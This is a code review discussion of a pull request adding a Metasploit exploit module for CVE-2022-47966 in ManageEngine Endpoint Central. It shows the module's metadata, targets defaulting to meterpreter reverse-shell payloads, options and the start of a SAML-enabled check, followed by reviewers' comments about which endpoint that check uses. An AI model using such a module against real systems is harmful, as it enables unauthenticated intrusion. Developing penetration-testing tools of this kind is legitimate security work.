modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb

```diff
@@ -0,0 +1,206 @@
+        'Description' => %q{
+          This exploits an unauthenticated remote code execution vulnerability
+          that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10
+          and below (CVE-2022-47966). Due to a dependency to an outdated library
+          (Apache Santuario version 1.4.1), it is possible to execute arbitrary
+          code by providing a crafted `samlResponse` XML to the Endpoint Central
+          SAML endpoint. Note that the target is only vulnerable if it is
+          configured with SAML-based SSO , and the service should be active.
+        },
+        'Author' => [
+          'Khoa Dinh', # Original research
+          'horizon3ai', # PoC
+          'Christophe De La Fuente', # Based on the original code of the ServiceDesk Plus Metasploit module
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Added some small tweaks to the original code of Christophe to make it work for this target
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-47966'],
+          ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],
+          ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],
+          ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],
+          ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']
+        ],
+        'Platform' => [ 'win' ],
+        'Payload' => {
+          'BadChars' => "\x27"
+        },
+        'Targets' => [
+          [
+            'Windows EXE Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_dropper,
+              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command,
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2023-01-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE,],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]),
+      OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ])
+    ])
+  end
+
+  def check_saml_enabled
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/SamlRequestServlet')
```

Comment:
```suggestion
      'uri' => normalize_uri(opts['TARGETURI'])
```

Reply:
@bwatters-r7 This is not possible because this is a different endpoint to check if `SAML` is enabled which is a prerequisite for the exploit to work.

Reply:
Wow; I see.  I completely misread that value.

Reply:
No worries, they look alike ;-)